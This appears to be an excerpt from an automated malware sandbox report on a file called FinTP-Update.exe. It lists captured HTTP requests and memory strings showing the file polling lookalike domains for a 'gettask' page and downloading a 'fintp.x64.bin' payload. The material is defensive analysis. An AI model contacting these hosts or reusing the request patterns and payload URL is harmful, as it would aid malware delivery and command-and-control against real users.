          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /fintp.x64.bin HTTP/1.0Host: www.flntp.ro
          Source: global trafficDNS traffic detected: DNS query: www.flntp.ro
          Source: global trafficDNS traffic detected: DNS query: www.finttp.ro
          Source: FinTP-Update.exeString found in binary or memory: http://www.flntp.ro/fintp.x64.bin
          Source: FinTP-Update.exe, 00000000.00000002.3357638321.00000018C64FC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.flntp.ro/fintp.x64.bin8Z:B
          Source: FinTP-Update.exeString found in binary or memory: http://www.flntp.ro/fintp.x64.binUpdating
          Source: FinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2335452666.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357676850.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2221796771.0000017F3890B000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2403144196.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651528682.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425344323.0000017F3890E000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313366127.0000017F3890E000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380628110.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3358210766.0000017F3890B000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626257376.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2199716524.0000017F3890B000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/
          Source: FinTP-Update.exe, 00000000.00000002.3358210766.0000017F3890B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/de
          Source: FinTP-Update.exe, 00000000.00000003.2425344323.0000017F3890E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/finttp.ro/rss/portallogin-gettask.htmlFt
          Source: FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/html
          Source: FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.html
          Source: FinTP-Update.exe, 00000000.00000002.3358210766.0000017F388E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.html011b87bd06
          Source: FinTP-Update.exe, 00000000.00000003.2651528682.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425344323.0000017F3890E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlAwtd
          Source: FinTP-Update.exe, 00000000.00000003.2403144196.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380628110.0000017F38910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlFt
          Source: FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlP
          Source: FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlRU
          Source: FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlS
          Source: FinTP-Update.exe, 00000000.00000003.2626257376.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmler
          Source: FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlhi%?
          Source: FinTP-Update.exe, 00000000.00000003.2199716524.0000017F3890B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlk~
          Source: FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlmt
          Source: FinTP-Update.exe, 00000000.00000003.2651528682.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425344323.0000017F3890E000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380628110.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlmw
          Source: FinTP-Update.exe, 00000000.00000003.2313200724.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2288264868.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2402975356.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2335299936.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425134169.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357499921.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491328068.0000017F36B96000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlople
          Source: FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlr&)
          Source: FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651300690.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlt
          Source: FinTP-Update.exe, 00000000.00000003.2313200724.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2266186373.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2288264868.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2402975356.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2335299936.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651300690.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425134169.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357499921.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491328068.0000017F36B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlv
          Source: FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/rss/portallogin-gettask.htmlz1
          Source: FinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finttp.ro/ss/portallogin-gettask.html
          Source: FinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2335452666.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2243779777.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357676850.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2266293573.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313315862.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651458102.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2403144196.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2221645510.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491486119.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188050658.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2403086446.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299179602.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720594519.0000017F36C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/
          Source: FinTP-Update.exe, 00000000.00000003.2335452666.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357676850.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313366127.0000017F3890E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/.finttp.ro/de
          Source: FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/.finttp.ro/rss/portallogin-gettask.htmlr
          Source: FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/Mwxd
